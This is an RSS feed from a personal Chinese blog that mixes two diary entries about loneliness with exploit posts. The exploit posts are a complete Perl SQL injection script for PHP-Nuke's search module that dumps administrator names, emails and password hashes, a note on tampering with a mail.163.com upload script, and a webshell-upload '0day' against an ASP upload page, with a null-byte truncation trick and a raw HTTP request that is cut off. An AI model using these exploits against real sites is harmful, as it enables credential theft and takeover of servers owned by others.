<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[惘然's Blog]]></title>
<link>http://www.wangran.net/</link>
<description><![CDATA[「此情可待成追忆，只是当时已惘然」]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[wangran@263.net(惘然)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>惘然&#39;s Blog</title>
	<url>http://www.wangran.net/images/logos.gif</url>
	<link>http://www.wangran.net/</link>
	<description>惘然&#39;s Blog</description>
</image>

			<item>
			<link>http://www.wangran.net/article/exploit/93.htm</link>
			<title><![CDATA[PHP-Nuke <= 8.1.0.3.5b Remote SQL Injection]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[漏洞|代码]]></category>
			<pubDate>Wed,28 Jul 2010 13:39:17 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=93</guid>
		<description><![CDATA[<div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>#!/usr/bin/perl<br/>use strict;<br/>use warnings;<br/><br/>use LWP::UserAgent;<br/>use HTTP::Cookies;<br/>use HTTP::Headers;<br/><br/>my $HostName = &#34;<a href="http://www.victime_site.org/path/" target="_blank" rel="external">http://www.victime_site.org/path/</a>&#34;; #Ins&#101;rt Victime Web Site Link<br/>my ($Victime) = shift o&#114; &amp;usage;<br/>my $Method = HTTP::Request-&gt;new(POST =&gt; $HostName.&#39;modules.php?name=Search&#39;);<br/>my $Cookies = new HTTP::Cookies;<br/>my $UserAgent = new LWP::UserAgent(<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;agent =&gt; &#39;Mozilla/5.0&#39;,<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;max_redirect =&gt; 0,<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cookie_jar =&gt; $Cookies,<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;default_headers =&gt; HTTP::Headers-&gt;new,<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) o&#114; die $!;<br/>my $Response;<br/>my $Referrer = &#34;query=Dante90, WaRWolFz Crew&amp;topic=&amp;category=0&amp;author=Dante90, WaRWolFz Crew&amp;days=0&amp;type=stories&#34;;<br/><br/>sub SQL_Injection {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;my ($Victime) = @_;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return &#34;Dante90&#39; UNION--\n Sel&#101;ct 1,2,3,CONCAT_WS(CHAR(32,58,32),`aid`,`name`,`email`,`pwd`),5,6,7,8,9,10 FROM `nuke_authors` Wh&#101;re `aid`=&#39;${Victime}&#39;-- &#34;;<br/>}<br/><br/>$Method-&gt;referer($HostName.&#39;modules.php?name=Search&#39;);<br/>$Method-&gt;content_type(&#39;application/x-www-form-urlencoded&#39;);<br/>$Method-&gt;content(&#34;query=Dante90, WaRWolFz Crew&amp;topic=&amp;category=0&amp;author=&#34;.SQL_Injection($Victime).&#34;&amp;days=0&amp;type=stories&#34;);<br/>$Response = $UserAgent-&gt;request($Method);<br/>$Response-&gt;is_success o&#114; die &#34;$HostName : &#34;,$Response-&gt;message,&#34;\n&#34;;<br/><br/>if ($Response-&gt;content =~ /([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9.@]{1,50}) : ([a-f0-9]{32})/i) {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;refresh($HostName, $1, $2, $3, $4);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Exploit Successfully Executed&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;system(&#34;pause&#34;);<br/>} else {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;refresh($HostName, &#34;&#34;, &#34;&#34;, &#34;&#34;, &#34;&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Error extracting sensible data.\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Exploit Failed&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n\n&#34;;<br/>}<br/><br/>sub usage {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;system(&#34;cls&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; \n [0-Day] PHP-Nuke &lt;= 8.1.0.3.5b (Search &#39;author&#39;) Remote SQL Injection Exploit\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * USAGE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * cd [Local Disk]:\\[Directory Of Exploit]\\&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * perl name_exploit.pl [victime]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Powered By Dante90, WaRWolFz Crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; *&nbsp;&nbsp;<a target="_blank" href="http://www.wangran.net/www.warwolfz.org" rel="external">www.warwolfz.org</a> - dante90_founder[at]warwolfz.org&nbsp;&nbsp;*\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;};<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit;<br/>}<br/><br/>sub refresh {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;system(&#34;cls&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; \n [0-Day] PHP-Nuke &lt;= 8.1.0.3.5b (Search &#39;author&#39;) Remote SQL Injection Exploit\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * USAGE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * cd [Local Disk]:\\[Directory Of Exploit]\\&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * perl name_exploit.pl [victime]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Powered By Dante90, WaRWolFz Crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; *&nbsp;&nbsp;<a target="_blank" href="http://www.wangran.net/www.warwolfz.org" rel="external">www.warwolfz.org</a> - dante90_founder[at]warwolfz.org&nbsp;&nbsp;*\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; -------------------------------------------------------- \n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;};<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Victime Site: &#34; . $_[0] . &#34;\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * User ID: &#34; . $_[1] . &#34;\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Username: &#34; . $_[2] . &#34;\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * Password: &#34; . $_[4] . &#34;\n&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#34; * E-Mail: &#34; . $_[3] . &#34;\n&#34;;<br/>}<br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/exploit/92.htm</link>
			<title><![CDATA[mail.163漏洞]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[漏洞|代码]]></category>
			<pubDate>Sun,04 Jul 2010 03:49:41 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=92</guid>
		<description><![CDATA[firebug或者开发人员工具 <br/>自己本地放个upload.js的修改版 用firebugs修改引入<br/>伟哥提供的漏洞<br/>本地验证&nbsp;&nbsp;很容易搞的&nbsp;&nbsp;不成功的就是人品有问题了<br/><br/><a href="http://zhidao.mail.163.com/zhidao/js/upload.js" target="_blank" rel="external">http://zhidao.mail.163.com/zhidao/js/upload.js</a><br/><img src="http://www.wangran.net/attachments/month_1007/120107434932.jpg" border="0" alt=""/><br/><br/>来源：马骏&#39;s blog<br/><br/>转载写明出处<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/Diary/91.htm</link>
			<title><![CDATA[残片..碎语]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[生活|日记]]></category>
			<pubDate>Wed,17 Mar 2010 15:02:08 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=91</guid>
		<description><![CDATA[一直以来就很少写日志..…<br/>对我来说,只有心情彻底不好的时候我才会去乱写写!<br/>当然..乱写也只是给自己看!<br/><br/>文字很随意,因为它并不能代表什么..我只是喜欢这样安静的写…随心所欲的发泄…<br/>有些苍白..有些散乱!!我不知道别人能不能读懂..<br/>喜欢的继续喜欢，讨厌的继续讨厌吧。<br/>与我无关。<br/><br/>在家里赖了一个上午的床,起来的时候才发现外面阳光很灿烂!不知道是不是冬天过去了,虽然气候很暖和，可是我还是没有温暖..不是因为什么，而是我感觉不到….<br/>酒其实个好东西, 喝醉过后,可以让人忘掉一切..开心的和不开心的..只是当再次醒来的时候，一切又不得不再继续。<br/>朋友们都在忙着自己的事，只有我天天挂在网上抱怨着无聊…有点惭愧,不是我不想干点正事..而是我找不到方向..经常沉醉于自己的幻想当中,把神经都浸泡在回忆里,不想理会周围的任何人或事..<br/>思维一度陷入混乱..就是因为混乱,所以我不知所措,茫然,没有方向感.,我想,总有一天我会在这样的环境下精神分裂..<br/>居然可以以一天到晚,只听一首歌，反复的播放!从坐到电脑面前开始.直到睡觉...最近更加变本加厉,可以20多个小时只开着一个网页在电脑面前发呆.. 想想都让人觉得害怕.<br/>又想起以前的事情了,生活不需要那么多的回忆..没有什么大不了…<br/>记忆是一件太苦的事情，所以我要放手了。<br/>嗯，再见..就像这样！<br/><br/><br/>关闭了在网上的一个博客，上面写着的一些伤感的，颓废的文字。我都选择删掉,其实忘记，有时是一种不得已而为之的苦衷..<br/>摊开敲击键盘的手掌.不知道它还能不能继续抓住我想要的某些东西,只是我要去的世界可能永远也到不了，我还是一个无法幸福的人..<br/>爱情,我一直闭口不谈.只想做个快乐的人，我是个简单的人,我想要的也是一个简单的生活，看见她的时候，已经没有了初次的那种感觉，但是又不是什么感觉都没有，想要她幸福，想要她快乐，也许就是此刻我的心情吧！不过，只是是两条平行的线而已，所以于我也没有太大的干系。我果然还是个只爱自己的人，任着自己的性子而为，只要自己开心就好。。<br/>常常为自己不得不面对现实而感到无奈，也为自己不得不八面玲珑感到恶心，后来发现，自己其实一直在任性的做着自己想做的事。这很好。安妮宝贝说过，有些事情，我们一直无能为力。<br/>写到这里，文字开始匮乏。不知道还能写点什么，音乐和我，我与文字。也许都回到了简单的从前。今年眼看着要过去，很多事情开始断断续续的做个了结。看过的小说，流过的眼泪，爱过的人群。<br/><br/> <br/><br/>在开始的时候开始结束，在结束的时候再重新开始，这就是我的生活。<br/><br/> <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By 惘然 2010-1.31 中午<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/Diary/90.htm</link>
			<title><![CDATA[冬夜·感伤]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[生活|日记]]></category>
			<pubDate>Wed,16 Dec 2009 12:41:21 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=90</guid>
		<description><![CDATA[岁月就像一条河，左岸是无法忘却的回忆，右岸是值得把握的青春年华，中间飞快流淌的，是年轻时隐隐的感伤<br/><br/> <br/><br/>时间不经意的从指间滑落，是怨指缝太宽还是恨时间太不留情。仿佛梦一场.转眼间又到年末了,眼看人生就要走到了第24个年头，心情很复杂，有欢喜，也有失落。<br/><br/> <br/><br/>独自坐在电脑桌前,听着窗外呼啸的北风,看着那一片片凋零的树叶，望着冰冰冷冷的显示器.思维一下又陷于混乱。努力甩了下头，使劲把身体往后靠，仰靠在椅子上，入眼,一片雪白的天花板,习惯的点上一支烟，闭上眼..贪婪的吸着尼古丁的味道，想象的伸出一支手,舞荡在半空中，触手过处，一片冰冰冷冷的空气中，夹杂着的全是寂寞。我也不想这样，可总是抵挡不住那壁藤般的蔓延。<br/><br/> <br/><br/>天天都要到半夜才能睡去,不知道干什么.也没干什么..QQ里来来往往的依旧是那几个熟悉的朋友。一大半的时间都是对着电脑发呆，对于我来说.似乎电脑和网络成了我生活中的主旋律。窗外的路灯依旧明亮，冷冷清清的街道，连行人都很稀少，旁边喧闹的KTV依旧灯红酒绿，不时从里面传出来那五音不全的咆哮声依旧那么刺耳，不过我现在倒觉得也许有时候这是最好的宣泄。有人说，思恋使痛苦的，但有谁知道，最痛苦的是没有什么可以去思恋，而我正是如此。<br/><br/> <br/><br/>有些人儿，有些事是无法碰触的，如果有一天，他们在风中消逝了，那也许是没有这个世界的又一次轮回。曾经在这里或在那里停留过的人儿，在不经意间的回头，瞬间凝固。就算失去在时间的长河中。<br/><br/>闭上眼睛，放上一首自己喜欢听的钢琴曲。听着柔和的音乐，良久过后，才发现眼角早已湿润。<br/><br/>这是个什么样的夜晚？是迷茫，是欢喜，怎么又成了回忆，最后安静了。我想那也是哭泣，无言的哭泣。还有什么比这更痛苦的呢？原来在这个寂寞流行的季节，那些蓬松的记忆，早已随着音乐渐渐飘散，好远，好远。<br/><br/> <br/><br/>一个不眠的夜晚，在阵阵感伤中结束。在明天太阳升起之前，让我用这苍白的文字记录吧。<br/><br/> <br/><br/> <br/><br/>　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　&nbsp;&nbsp; By 惘然 2009-12-15 夜<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/exploit/89.htm</link>
			<title><![CDATA[花马收信箱子getshell 0day]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[漏洞|代码]]></category>
			<pubDate>Thu,29 Oct 2009 09:59:34 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=89</guid>
		<description><![CDATA[特征：login.asp能看到版权，不过有些箱子把这个地址改求了。另外主目录下存在一个wsidny.asp<br/>整套程序过滤什么的灰常的严密，看得出来是专业的安全人士写的，唯一可以利用的地方就在这个wsidny.asp<br/>看代码：<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;!-- #include file=&#34;conn.asp&#34;--&gt;<br/>&lt;% <br/>&nbsp;&nbsp;&nbsp;&nbsp;Server.ScriptTimeout = 36000<br/>&nbsp;&nbsp; PostSize = Request.TotalBytes<br/>if postsize=0 then<br/>response.End()<br/>end if<br/>&nbsp;&nbsp;&nbsp;&nbsp;BytesRead = 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp; ReadSize=256<br/>&nbsp;&nbsp;&nbsp;&nbsp; HeadSize=256<br/>&nbsp;&nbsp;&nbsp;&nbsp; filename = Request.BinaryRead(ReadSize)<br/>&nbsp;&nbsp;&nbsp;&nbsp; BytesRead = BytesRead + ReadSize&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;PostData = Request.BinaryRead(PostSize - BytesRead)<br/>&nbsp;&nbsp;&nbsp;&nbsp;StoreFile(filename)<br/>Function Bytes2bStr(vin)<br/>if lenb(vin) =0 then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Bytes2bStr = &#34;&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit function<br/>end if<br/> Dim BytesStream,StringReturn<br/> set BytesStream = Server.Cr&#101;ateObject(&#34;ADODB.Stream&#34;)<br/> BytesStream.Type = 2 <br/> BytesStream.Open<br/> BytesStream.WriteText vin<br/> BytesStream.Position = 0<br/> BytesStream.Charset = &#34;gb2312&#34;<br/> BytesStream.Position = 2<br/> StringReturn = BytesStream.ReadText<br/> BytesStream.close<br/> set BytesStream = Nothing<br/> Bytes2bStr = StringReturn<br/>End Function<br/>Function StoreFile(filename)<br/>filea=Bytes2bStr(filename)<br/>filea=LCase(filea)<br/><br/>if instr(filea,&#34;.&#34;)&gt;0 then<br/>fileb=split(filea,&#34;.&#34;)<br/>num2=ubound(fileb)<br/>if instr(&#34;jpg|gif|jpeg|png|bmp&#34;,fileb(num2))&gt;0 then<br/>filea=filea<br/>else<br/>filea=filea&amp;&#34;.gif&#34;<br/>end if<br/>else<br/>filea=filea&amp;&#34;.gif&#34;<br/>end if<br/><br/>Path=server.MapPath(imgFolder&amp;filea)<br/>Set oFileStream = Cr&#101;ateObject (&#34;ADODB.Stream&#34;)<br/>&nbsp;&nbsp;oFileStream.Type = 1<br/>&nbsp;&nbsp;oFileStream.Mode = 3<br/>&nbsp;&nbsp;oFileStream.Open<br/>&nbsp;&nbsp;&nbsp;&nbsp;oFileStream.Write(PostData) <br/>&nbsp;&nbsp;oFileStream.SaveToFile Path,2<br/>&nbsp;&nbsp;oFileStream.Close<br/>&nbsp;&nbsp;Set oFileStream = Nothing <br/>End Function<br/>&nbsp;&nbsp;&nbsp;&nbsp;Response.Write PostSize<br/>&nbsp;&nbsp;&nbsp;&nbsp;Response.Write &#34; bytes were read.&#34;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>%&gt;</div></div><br/><br/>没搞懂这个页面是用来干什么的，可能是生成图片破密保的吧。一开始是想本地构造表单直接提交，上传带;的图片马，结果因为是Request.BinaryRead取的数据，所以urlencode过的参数都取不出来。改用vbs发包。这里又有个问题，因为路径是取的前256个字符，超过了后面server.MapPath所支持的最大长度，于是想到了用\00截断，把vbs发送的http请求抓出来，用ue写截断，然后提交，去掉包含文件测试成功。但是带包含的时候还报错。因为前面的conn.asp包含了一个fsql.asp防注页面，检查了request.form，调用了request.form之后就不能再调用Request.BinaryRead了否则会报错。那这个页面的意义何在？<br/>在这里纠结了好久，试着去掉http头里的Content-Type: application/x-www-form-urlencoded，提交，发现竟然上传成功鸟，这才发现自己以前一直SB了。去掉这一个头，iis就会认为没有用表单格式提交的参数，这样用request.form就不会收到任何数据，也就不会跟后面的Request.BinaryRead冲突了<br/>下面发利用方法：<br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">POST /DNFZONX/wsidny.asp HTTP/1.1<br/>Accept-Language: zh-cn<br/>Content-Length: 284<br/>Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*<br/>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br/>Host: xxx.fuck.com<br/>Connection: Keep-Alive<br/><br/>a.asp 